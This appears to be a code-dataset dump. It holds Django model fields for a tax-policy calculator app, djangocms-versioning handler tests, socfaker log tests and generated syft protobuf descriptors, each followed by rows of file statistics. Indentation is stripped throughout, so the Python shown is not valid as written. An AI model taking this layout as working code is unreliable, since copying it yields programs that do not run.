ETC_pe_Married_2 = CommaSeparatedField(default=None, blank=True, null=True)
ETC_pe_Married_cpi = models.NullBooleanField(default=None, blank=True, null=True)
# Child and dependent care phaseout
CDCC_c = CommaSeparatedField(default=None, blank=True, null=True)
CDCC_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
CDCC_ps = CommaSeparatedField(default=None, blank=True, null=True)
CDCC_ps_cpi = models.NullBooleanField(default=None, blank=True, null=True)
CDCC_crt = CommaSeparatedField(default=None, blank=True, null=True)
CDCC_crt_cpi = models.NullBooleanField(default=None, blank=True, null=True)
# Pass through tax parameters
PT_rt1 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk1_0 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk1_1 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk1_2 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk1_3 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk1_4 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk1_cpi = models.NullBooleanField(default=None, blank=True, null=True)
PT_rt2 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk2_0 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk2_1 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk2_2 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk2_3 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk2_4 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk2_cpi = models.NullBooleanField(default=None, blank=True, null=True)
PT_rt3 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk3_0 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk3_1 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk3_2 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk3_3 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk3_4 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk3_cpi = models.NullBooleanField(default=None, blank=True, null=True)
PT_rt4 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk4_0 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk4_1 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk4_2 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk4_3 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk4_4 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk4_cpi = models.NullBooleanField(default=None, blank=True, null=True)
PT_rt5 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk5_0 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk5_1 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk5_2 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk5_3 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk5_4 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk5_cpi = models.NullBooleanField(default=None, blank=True, null=True)
PT_rt6 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk6_0 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk6_1 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk6_2 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk6_3 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk6_4 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk6_cpi = models.NullBooleanField(default=None, blank=True, null=True)
PT_rt7 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk7_0 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk7_1 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk7_2 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk7_3 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk7_4 = CommaSeparatedField(default=None, blank=True, null=True)
PT_brk7_cpi = models.NullBooleanField(default=None, blank=True, null=True)
PT_rt8 = CommaSeparatedField(default=None, blank=True, null=True)
PT_EligibleRate_active = CommaSeparatedField(default=None, blank=True, null=True)
PT_EligibleRate_passive = CommaSeparatedField(default=None, blank=True, null=True)
PT_wages_active_income = models.CharField(default="False", blank=True, null=True, max_length=50)
PT_top_stacking = models.CharField(default="True", blank=True, null=True, max_length=50)
PT_exclusion_rt = CommaSeparatedField(default=None, blank=True, null=True)
PT_exclusion_wage_limit = CommaSeparatedField(default=None, blank=True, null=True)
PT_exclusion_wage_limit_cpi = models.NullBooleanField(default=None, blank=True, null=True)
# Fair Share Tax Parameters
FST_AGI_trt = CommaSeparatedField(default=None, blank=True, null=True)
FST_AGI_thd_lo_0 = CommaSeparatedField(default=None, blank=True, null=True)
FST_AGI_thd_lo_1 = CommaSeparatedField(default=None, blank=True, null=True)
FST_AGI_thd_lo_2 = CommaSeparatedField(default=None, blank=True, null=True)
FST_AGI_thd_lo_3 = CommaSeparatedField(default=None, blank=True, null=True)
FST_AGI_thd_lo_4 = CommaSeparatedField(default=None, blank=True, null=True)
FST_AGI_thd_lo_cpi = models.NullBooleanField(default=None, blank=True, null=True)
FST_AGI_thd_hi_0 = CommaSeparatedField(default=None, blank=True, null=True)
FST_AGI_thd_hi_1 = CommaSeparatedField(default=None, blank=True, null=True)
FST_AGI_thd_hi_2 = CommaSeparatedField(default=None, blank=True, null=True)
FST_AGI_thd_hi_3 = CommaSeparatedField(default=None, blank=True, null=True)
FST_AGI_thd_hi_4 = CommaSeparatedField(default=None, blank=True, null=True)
FST_AGI_thd_hi_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AGI_surtax_thd_0 = CommaSeparatedField(default=None, blank=True, null=True)
AGI_surtax_thd_1 = CommaSeparatedField(default=None, blank=True, null=True)
AGI_surtax_thd_2 = CommaSeparatedField(default=None, blank=True, null=True)
AGI_surtax_thd_3 = CommaSeparatedField(default=None, blank=True, null=True)
AGI_surtax_thd_4 = CommaSeparatedField(default=None, blank=True, null=True)
AGI_surtax_thd_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AGI_surtax_trt = CommaSeparatedField(default=None, blank=True, null=True)
LST = CommaSeparatedField(default=None, blank=True, null=True)
CR_RetirementSavings_hc = CommaSeparatedField(default=None, blank=True, null=True)
CR_ForeignTax_hc = CommaSeparatedField(default=None, blank=True, null=True)
CR_ResidentialEnergy_hc = CommaSeparatedField(default=None, blank=True, null=True)
CR_GeneralBusiness_hc = CommaSeparatedField(default=None, blank=True, null=True)
CR_MinimumTax_hc = CommaSeparatedField(default=None, blank=True, null=True)
CR_AmOppRefundable_hc = CommaSeparatedField(default=None, blank=True, null=True)
CR_AmOppNonRefundable_hc = CommaSeparatedField(default=None, blank=True, null=True)
CR_SchR_hc = CommaSeparatedField(default=None, blank=True, null=True)
CR_OtherCredits_hc = CommaSeparatedField(default=None, blank=True, null=True)
CR_Education_hc = CommaSeparatedField(default=None, blank=True, null=True)
UBI_u18 = CommaSeparatedField(default=None, blank=True, null=True)
UBI_1820 = CommaSeparatedField(default=None, blank=True, null=True)
UBI_21 = CommaSeparatedField(default=None, blank=True, null=True)
UBI_ecrt = CommaSeparatedField(default=None, blank=True, null=True)
# Boolean Checkbox Fields
ALD_InvInc_ec_base_RyanBrady = models.CharField(default="False", blank=True, null=True, max_length=50)
NIIT_PT_taxed = models.CharField(default="False", blank=True, null=True, max_length=50)
CG_nodiff = models.CharField(default="False", blank=True, null=True, max_length=50)
EITC_indiv = models.CharField(default="False", blank=True, null=True, max_length=50)
CTC_new_refund_limited = models.CharField(default="False", blank=True, null=True, max_length=50)
CTC_new_refund_limited_all_payroll = models.CharField(default="False", blank=True, null=True, max_length=50)
II_no_em_nu18 = models.CharField(default="False", blank=True, null=True, max_length=50)
# Inflation adjustments
inflation = models.FloatField(default=None, blank=True, null=True,
validators=[MinValueValidator(0.000), MaxValueValidator(1.000)])
inflation_years = models.FloatField(default=None, blank=True, null=True,
validators=[MinValueValidator(0), MaxValueValidator(10)])
medical_inflation = models.FloatField(default=None, blank=True, null=True,
validators=[MinValueValidator(0.000), MaxValueValidator(1.000)])
medical_years = models.FloatField(default=None, blank=True, null=True,
validators=[MinValueValidator(0), MaxValueValidator(10)])
cpi_offset = CommaSeparatedField(default=None, blank=True, null=True)
# Growth Assumptions
factor_adjustment = CommaSeparatedField(default=None, blank=True, null=True)
factor_target = CommaSeparatedField(default=None, blank=True, null=True)
growth_choice = models.CharField(blank=True, default=None, null=True,
max_length=50)
# Job IDs when running a job
job_ids = SeparatedValuesField(blank=True, default=None, null=True)
jobs_not_ready = SeparatedValuesField(blank=True, default=None, null=True)
# Starting Year of the reform calculation
first_year = models.IntegerField(default=None, null=True)
# Record whether or not this was a quick calculation on a sample of data
quick_calc = models.BooleanField(default=False)
# generate fields from default param data
# this may eventually be useful if we're able to ensure syncdb picks up
# field changes and automatically create migrations
"""
for param in TAXCALC_DEFAULT_PARAMS.values():
for col_field in param.col_fields:
exec(col_field.id + \
" = CommaSeparatedField(default=None, null=True, blank=True)")
if param.inflatable:
exec(param.cpi_field.id + \
" = models.NullBooleanField(default=None, blank=True, null=True)")
"""
# Result
tax_result = JSONField(default=None, blank=True, null=True)
# # raw gui input
raw_input_fields = JSONField(default=None, blank=True, null=True)
#
# # validated gui input
input_fields = JSONField(default=None, blank=True, null=True)
# deprecated fields list
deprecated_fields = ArrayField(
models.CharField(max_length=100, blank=True),
blank=True,
null=True
)
# JSON input text
json_text = models.ForeignKey(JSONReformTaxCalculator, null=True, default=None, blank=True)
# Error text
error_text = models.ForeignKey(ErrorMessageTaxCalculator, null=True, default=None, blank=True)
# Creation DateTime
creation_date = models.DateTimeField(
default=make_aware(datetime.datetime(2015, 1, 1))
)
def get_tax_result(self):
"""
If taxcalc version is greater than or equal to 0.13.0, return table
If taxcalc version is less than 0.13.0, then rename keys to new names
and then return table
"""
return Resultable.get_tax_result(self, OutputUrl)
NONPARAM_FIELDS = set(["job_ids", "jobs_not_ready", "first_year", "quick_calc",
"tax_result", "raw_input_fields", "input_fields",
"json_text", "error_text", "creation_date", "id",
"data_source"])
def set_fields(self):
"""
Parse raw fields
1. Only keep fields that user specifies
2. Map TB names to TC names
3. Do more specific type checking--in particular, check if
field is the type that Tax-Calculator expects from this param
4. Remove errors on undisplayed parameters
"""
Fieldable.set_fields(self, taxcalc.Policy,
nonparam_fields=self.NONPARAM_FIELDS)
def get_model_specs(self):
"""
Build JSON model specifications up from fields data
returns: reform_dict, assumptions_dict, errors_warnings
"""
(reform_dict, assumptions_dict, reform_text, assumptions_text,
errors_warnings) = param_formatters.get_reform_from_gui(
self.start_year,
taxbrain_fields=self.input_fields,
use_puf_not_cps=self.use_puf_not_cps
)
Fieldable.pop_extra_errors(self, errors_warnings)
return (reform_dict, assumptions_dict, reform_text, assumptions_text,
errors_warnings)
@property
def start_year(self):
# alias for first_year
return self.first_year
class Meta:
permissions = (
("view_inputs", "Allowed to view Taxbrain."),
)
class WorkerNodesCounter(models.Model):
'''
This class specifies a counter for which set of worker nodes we have
just deployed a TaxBrain job to. It is a singleton class to enforce
round robin behavior with multiple dynos running simultaneously. The
database becomes the single source of truth for which set of nodes
just got the last dispatch
'''
singleton_enforce = models.IntegerField(default=1, unique=True)
current_offset = models.IntegerField(default=0)
class OutputUrl(models.Model):
"""
This model creates a unique url for each calculation.
"""
unique_inputs = models.ForeignKey(TaxSaveInputs, default=None)
user = models.ForeignKey(User, null=True, default=None)
model_pk = models.IntegerField(default=None, null=True)
# Expected Completion DateTime
exp_comp_datetime = models.DateTimeField(
default=make_aware(datetime.datetime(2015, 1, 1))
)
uuid = models.UUIDField(default=uuid.uuid4, null=True, editable=False, max_length=32, blank=True, unique=True)
taxcalc_vers = models.CharField(blank=True, default=None, null=True,
max_length=50)
webapp_vers = models.CharField(blank=True, default=None, null=True,
max_length=50)
def get_absolute_url(self):
kwargs = {
'pk': self.pk
}
return reverse('output_detail', kwargs=kwargs)
| 63.032787
| 114
| 0.757533
| 7,193
| 53,830
| 5.463645
| 0.072014
| 0.131221
| 0.180941
| 0.23402
| 0.851679
| 0.851145
| 0.847837
| 0.839542
| 0.797176
| 0.535623
| 0
| 0.014753
| 0.139941
| 53,830
| 853
| 115
| 63.106682
| 0.834115
| 0.055285
| 0
| 0.071637
| 0
| 0
| 0.009175
| 0.000838
| 0
| 0
| 0
| 0
| 0.001462
| 1
| 0.019006
| false
| 0.001462
| 0.024854
| 0.002924
| 0.923977
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
7db26938d463bc057c6e3990f08559155c9e32be
| 9,473
|
py
|
Python
|
tests/test_handlers.py
|
chaosk/djangocms-versioning
|
257910183502536882df6e2459c5c6f325e6a584
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_handlers.py
|
chaosk/djangocms-versioning
|
257910183502536882df6e2459c5c6f325e6a584
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_handlers.py
|
chaosk/djangocms-versioning
|
257910183502536882df6e2459c5c6f325e6a584
|
[
"BSD-3-Clause"
] | null | null | null |
from datetime import datetime
from django.utils import timezone
from cms.api import add_plugin
from cms.models import Placeholder, UserSettings
from cms.test_utils.testcases import CMSTestCase
from freezegun import freeze_time
from djangocms_versioning.models import Version
from djangocms_versioning.test_utils import factories
class HandlersTestCase(CMSTestCase):
def test_modified_date(self):
pv = factories.PollVersionFactory()
dt = datetime(2016, 6, 6, tzinfo=timezone.utc)
with freeze_time(dt):
pv.content.save()
pv = Version.objects.get(pk=pv.pk)
self.assertEqual(pv.modified, dt)
def test_add_plugin(self):
version = factories.PageVersionFactory()
placeholder = factories.PlaceholderFactory(source=version.content)
poll = factories.PollFactory()
dt = datetime(2016, 6, 6, tzinfo=timezone.utc)
with freeze_time(dt):
endpoint = self.get_add_plugin_uri(
placeholder=placeholder,
plugin_type="PollPlugin",
language=version.content.language,
)
data = {"poll": poll.pk}
with self.login_user_context(self.get_superuser()):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
version = Version.objects.get(pk=version.pk)
self.assertEqual(version.modified, dt)
def test_change_plugin(self):
version = factories.PageVersionFactory()
placeholder = factories.PlaceholderFactory(source=version.content)
poll = factories.PollFactory()
plugin = add_plugin(
placeholder, "PollPlugin", version.content.language, poll=poll
)
dt = datetime(2016, 6, 6, tzinfo=timezone.utc)
with freeze_time(dt):
endpoint = self.get_change_plugin_uri(plugin)
data = {"poll": poll.pk}
with self.login_user_context(self.get_superuser()):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
version = Version.objects.get(pk=version.pk)
self.assertEqual(version.modified, dt)
def test_clear_placeholder(self):
version = factories.PageVersionFactory()
placeholder = factories.PlaceholderFactory(source=version.content)
dt = datetime(2016, 6, 6, tzinfo=timezone.utc)
with freeze_time(dt):
endpoint = self.get_clear_placeholder_url(placeholder)
with self.login_user_context(self.get_superuser()):
response = self.client.post(endpoint, {"test": 0})
self.assertEqual(response.status_code, 302)
version = Version.objects.get(pk=version.pk)
self.assertEqual(version.modified, dt)
def test_delete_plugin(self):
version = factories.PageVersionFactory()
placeholder = factories.PlaceholderFactory(source=version.content)
poll = factories.PollFactory()
plugin = add_plugin(
placeholder, "PollPlugin", version.content.language, poll=poll
)
dt = datetime(2016, 6, 6, tzinfo=timezone.utc)
with freeze_time(dt):
endpoint = self.get_delete_plugin_uri(plugin)
data = {"poll": poll.pk}
with self.login_user_context(self.get_superuser()):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 302)
version = Version.objects.get(pk=version.pk)
self.assertEqual(version.modified, dt)
def test_add_plugins_from_placeholder(self):
version = factories.PageVersionFactory()
source_placeholder = factories.PlaceholderFactory(source=version.content)
target_placeholder = factories.PlaceholderFactory(source=version.content)
poll = factories.PollFactory()
plugin = add_plugin(
source_placeholder, "PollPlugin", version.content.language, poll=poll
)
dt = datetime(2016, 6, 6, tzinfo=timezone.utc)
with freeze_time(dt):
endpoint = self.get_copy_plugin_uri(plugin)
data = {
"source_language": version.content.language,
"source_placeholder_id": source_placeholder.pk,
"target_language": version.content.language,
"target_placeholder_id": target_placeholder.pk,
}
with self.login_user_context(self.get_superuser()):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
version = Version.objects.get(pk=version.pk)
self.assertEqual(version.modified, dt)
def test_paste_placeholder(self):
version = factories.PageVersionFactory()
placeholder = factories.PlaceholderFactory(source=version.content)
poll = factories.PollFactory()
user_settings = UserSettings.objects.create(
language=version.content.language,
user=self.get_superuser(),
clipboard=Placeholder.objects.create(slot="clipboard"),
)
placeholder_plugin = add_plugin(
user_settings.clipboard, "PlaceholderPlugin", version.content.language
)
plugin = add_plugin(
placeholder_plugin.placeholder_ref, "PollPlugin", version.content.language, poll=poll
)
dt = datetime(2016, 6, 6, tzinfo=timezone.utc)
with freeze_time(dt):
endpoint = self.get_move_plugin_uri(plugin)
data = {
"plugin_id": placeholder_plugin.pk,
"placeholder_id": placeholder.pk,
"target_language": version.content.language,
"move_a_copy": "true",
"target_position": 1,
}
with self.login_user_context(self.get_superuser()):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
version = Version.objects.get(pk=version.pk)
self.assertEqual(version.modified, dt)
def test_paste_plugin(self):
version = factories.PageVersionFactory()
source_placeholder = factories.PlaceholderFactory(source=version.content)
target_placeholder = factories.PlaceholderFactory(source=version.content)
poll = factories.PollFactory()
plugin = add_plugin(
source_placeholder, "PollPlugin", version.content.language, poll=poll
)
dt = datetime(2016, 6, 6, tzinfo=timezone.utc)
with freeze_time(dt):
endpoint = self.get_move_plugin_uri(plugin)
data = {
"plugin_id": plugin.pk,
"placeholder_id": target_placeholder.pk,
"target_language": version.content.language,
"move_a_copy": "true",
"target_position": 1,
}
with self.login_user_context(self.get_superuser()):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
version = Version.objects.get(pk=version.pk)
self.assertEqual(version.modified, dt)
def test_cut_plugin(self):
version = factories.PageVersionFactory()
placeholder = factories.PlaceholderFactory(source=version.content)
poll = factories.PollFactory()
user_settings = UserSettings.objects.create(
language=version.content.language,
user=self.get_superuser(),
clipboard=Placeholder.objects.create(slot="clipboard"),
)
plugin = add_plugin(
placeholder, "PollPlugin", version.content.language, poll=poll
)
dt = datetime(2016, 6, 6, tzinfo=timezone.utc)
with freeze_time(dt):
endpoint = self.get_move_plugin_uri(plugin)
data = {
"plugin_id": plugin.pk,
"target_language": version.content.language,
"placeholder_id": user_settings.clipboard_id,
}
with self.login_user_context(self.get_superuser()):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
version = Version.objects.get(pk=version.pk)
self.assertEqual(version.modified, dt)
def test_move_plugin(self):
version = factories.PageVersionFactory()
source_placeholder = factories.PlaceholderFactory(source=version.content)
target_placeholder = factories.PlaceholderFactory(source=version.content)
poll = factories.PollFactory()
plugin = add_plugin(
source_placeholder, "PollPlugin", version.content.language, poll=poll
)
dt = datetime(2016, 6, 6, tzinfo=timezone.utc)
with freeze_time(dt):
endpoint = self.get_move_plugin_uri(plugin)
data = {
"plugin_id": plugin.pk,
"target_language": version.content.language,
"placeholder_id": target_placeholder.pk,
"target_position": 1,
}
with self.login_user_context(self.get_superuser()):
response = self.client.post(endpoint, data)
self.assertEqual(response.status_code, 200)
version = Version.objects.get(pk=version.pk)
self.assertEqual(version.modified, dt)
| 38.50813
| 97
| 0.632007
| 966
| 9,473
| 6.033126
| 0.090062
| 0.069664
| 0.064173
| 0.090597
| 0.85175
| 0.840769
| 0.834248
| 0.825841
| 0.825841
| 0.825841
| 0
| 0.01319
| 0.27172
| 9,473
| 245
| 98
| 38.665306
| 0.83157
| 0
| 0
| 0.717172
| 0
| 0
| 0.045392
| 0.004434
| 0
| 0
| 0
| 0
| 0.09596
| 1
| 0.050505
| false
| 0
| 0.040404
| 0
| 0.09596
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
814ddb2f331f68fd127a3353c52ccbef7d8bdd79
| 223
|
py
|
Python
|
tests/test_socfaker_logs_windows_eventlog.py
|
atstpls/soc-faker
|
119fcb9c4329a918ef9001ac5eaa36251b862bf0
|
[
"MIT"
] | 122
|
2020-02-21T16:06:54.000Z
|
2022-03-21T13:53:03.000Z
|
tests/test_socfaker_logs_windows_eventlog.py
|
atstpls/soc-faker
|
119fcb9c4329a918ef9001ac5eaa36251b862bf0
|
[
"MIT"
] | 13
|
2020-01-29T16:37:05.000Z
|
2022-01-27T21:30:10.000Z
|
tests/test_socfaker_logs_windows_eventlog.py
|
atstpls/soc-faker
|
119fcb9c4329a918ef9001ac5eaa36251b862bf0
|
[
"MIT"
] | 20
|
2020-04-10T11:59:29.000Z
|
2022-02-10T09:20:26.000Z
|
def test_socfaker_logs_windows_eventlog(socfaker_fixture):
assert socfaker_fixture.logs.windows.eventlog()
def test_socfaker_logs_windows_sysmon_logs(socfaker_fixture):
assert socfaker_fixture.logs.windows.sysmon()
| 44.6
| 61
| 0.856502
| 29
| 223
| 6.137931
| 0.310345
| 0.247191
| 0.168539
| 0.213483
| 0.820225
| 0.52809
| 0.52809
| 0
| 0
| 0
| 0
| 0
| 0.071749
| 223
| 5
| 62
| 44.6
| 0.859903
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.5
| false
| 0
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8171538efcf108c05d6c10e2d8869f07afd208aa
| 27,193
|
py
|
Python
|
packages/syft/src/syft/proto/core/adp/scalar_pb2.py
|
callezenwaka/PySyft
|
2545c302441cfe727ec095c4f9aa136bff02be32
|
[
"Apache-1.1"
] | 1
|
2021-09-14T10:56:43.000Z
|
2021-09-14T10:56:43.000Z
|
packages/syft/src/syft/proto/core/adp/scalar_pb2.py
|
callezenwaka/PySyft
|
2545c302441cfe727ec095c4f9aa136bff02be32
|
[
"Apache-1.1"
] | 2
|
2021-04-02T10:12:44.000Z
|
2021-04-02T10:12:50.000Z
|
packages/syft/src/syft/proto/core/adp/scalar_pb2.py
|
callezenwaka/PySyft
|
2545c302441cfe727ec095c4f9aa136bff02be32
|
[
"Apache-1.1"
] | 1
|
2021-08-19T12:23:01.000Z
|
2021-08-19T12:23:01.000Z
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: proto/core/adp/scalar.proto
"""Generated protocol buffer code."""
# third party
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
# syft absolute
from syft.proto.core.adp import entity_pb2 as proto_dot_core_dot_adp_dot_entity__pb2
from syft.proto.core.common import (
common_object_pb2 as proto_dot_core_dot_common_dot_common__object__pb2,
)
DESCRIPTOR = _descriptor.FileDescriptor(
name="proto/core/adp/scalar.proto",
package="syft.core.adp",
syntax="proto3",
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x1bproto/core/adp/scalar.proto\x12\rsyft.core.adp\x1a%proto/core/common/common_object.proto\x1a\x1bproto/core/adp/entity.proto"7\n\x12IntermediateScalar\x12!\n\x02id\x18\x01 \x01(\x0b\x32\x15.syft.core.common.UID"\xb8\x01\n\nBaseScalar\x12!\n\x02id\x18\x01 \x01(\x0b\x32\x15.syft.core.common.UID\x12\x14\n\x07min_val\x18\x02 \x01(\x02H\x00\x88\x01\x01\x12\x12\n\x05value\x18\x03 \x01(\x02H\x01\x88\x01\x01\x12\x14\n\x07max_val\x18\x04 \x01(\x02H\x02\x88\x01\x01\x12%\n\x06\x65ntity\x18\x05 \x01(\x0b\x32\x15.syft.core.adp.EntityB\n\n\x08_min_valB\x08\n\x06_valueB\n\n\x08_max_val"<\n\x17IntermediateGammaScalar\x12!\n\x02id\x18\x01 \x01(\x0b\x32\x15.syft.core.common.UID"\xb9\x01\n\x0bGammaScalar\x12!\n\x02id\x18\x01 \x01(\x0b\x32\x15.syft.core.common.UID\x12\x14\n\x07min_val\x18\x02 \x01(\x02H\x00\x88\x01\x01\x12\x12\n\x05value\x18\x03 \x01(\x02H\x01\x88\x01\x01\x12\x14\n\x07max_val\x18\x04 \x01(\x02H\x02\x88\x01\x01\x12%\n\x06\x65ntity\x18\x05 \x01(\x0b\x32\x15.syft.core.adp.EntityB\n\n\x08_min_valB\x08\n\x06_valueB\n\n\x08_max_val"\x9b\x01\n\x15IntermediatePhiScalar\x12!\n\x02id\x18\x01 \x01(\x0b\x32\x15.syft.core.common.UID\x12%\n\x06\x65ntity\x18\x02 \x01(\x0b\x32\x15.syft.core.adp.Entity\x12.\n\x05gamma\x18\x03 \x01(\x0b\x32\x1a.syft.core.adp.GammaScalarH\x00\x88\x01\x01\x42\x08\n\x06_gamma"\xf1\x01\n\tPhiScalar\x12!\n\x02id\x18\x01 \x01(\x0b\x32\x15.syft.core.common.UID\x12\x14\n\x07min_val\x18\x02 \x01(\x02H\x00\x88\x01\x01\x12\x12\n\x05value\x18\x03 \x01(\x02H\x01\x88\x01\x01\x12\x14\n\x07max_val\x18\x04 \x01(\x02H\x02\x88\x01\x01\x12%\n\x06\x65ntity\x18\x05 \x01(\x0b\x32\x15.syft.core.adp.Entity\x12.\n\x05gamma\x18\x06 \x01(\x0b\x32\x1a.syft.core.adp.GammaScalarH\x03\x88\x01\x01\x42\n\n\x08_min_valB\x08\n\x06_valueB\n\n\x08_max_valB\x08\n\x06_gammab\x06proto3',
dependencies=[
proto_dot_core_dot_common_dot_common__object__pb2.DESCRIPTOR,
proto_dot_core_dot_adp_dot_entity__pb2.DESCRIPTOR,
],
)
_INTERMEDIATESCALAR = _descriptor.Descriptor(
name="IntermediateScalar",
full_name="syft.core.adp.IntermediateScalar",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="id",
full_name="syft.core.adp.IntermediateScalar.id",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=114,
serialized_end=169,
)
_BASESCALAR = _descriptor.Descriptor(
name="BaseScalar",
full_name="syft.core.adp.BaseScalar",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="id",
full_name="syft.core.adp.BaseScalar.id",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="min_val",
full_name="syft.core.adp.BaseScalar.min_val",
index=1,
number=2,
type=2,
cpp_type=6,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="value",
full_name="syft.core.adp.BaseScalar.value",
index=2,
number=3,
type=2,
cpp_type=6,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="max_val",
full_name="syft.core.adp.BaseScalar.max_val",
index=3,
number=4,
type=2,
cpp_type=6,
label=1,
has_default_value=False,
default_value=float(0),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="entity",
full_name="syft.core.adp.BaseScalar.entity",
index=4,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="_min_val",
full_name="syft.core.adp.BaseScalar._min_val",
index=0,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[],
),
_descriptor.OneofDescriptor(
name="_value",
full_name="syft.core.adp.BaseScalar._value",
index=1,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[],
),
_descriptor.OneofDescriptor(
name="_max_val",
full_name="syft.core.adp.BaseScalar._max_val",
index=2,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[],
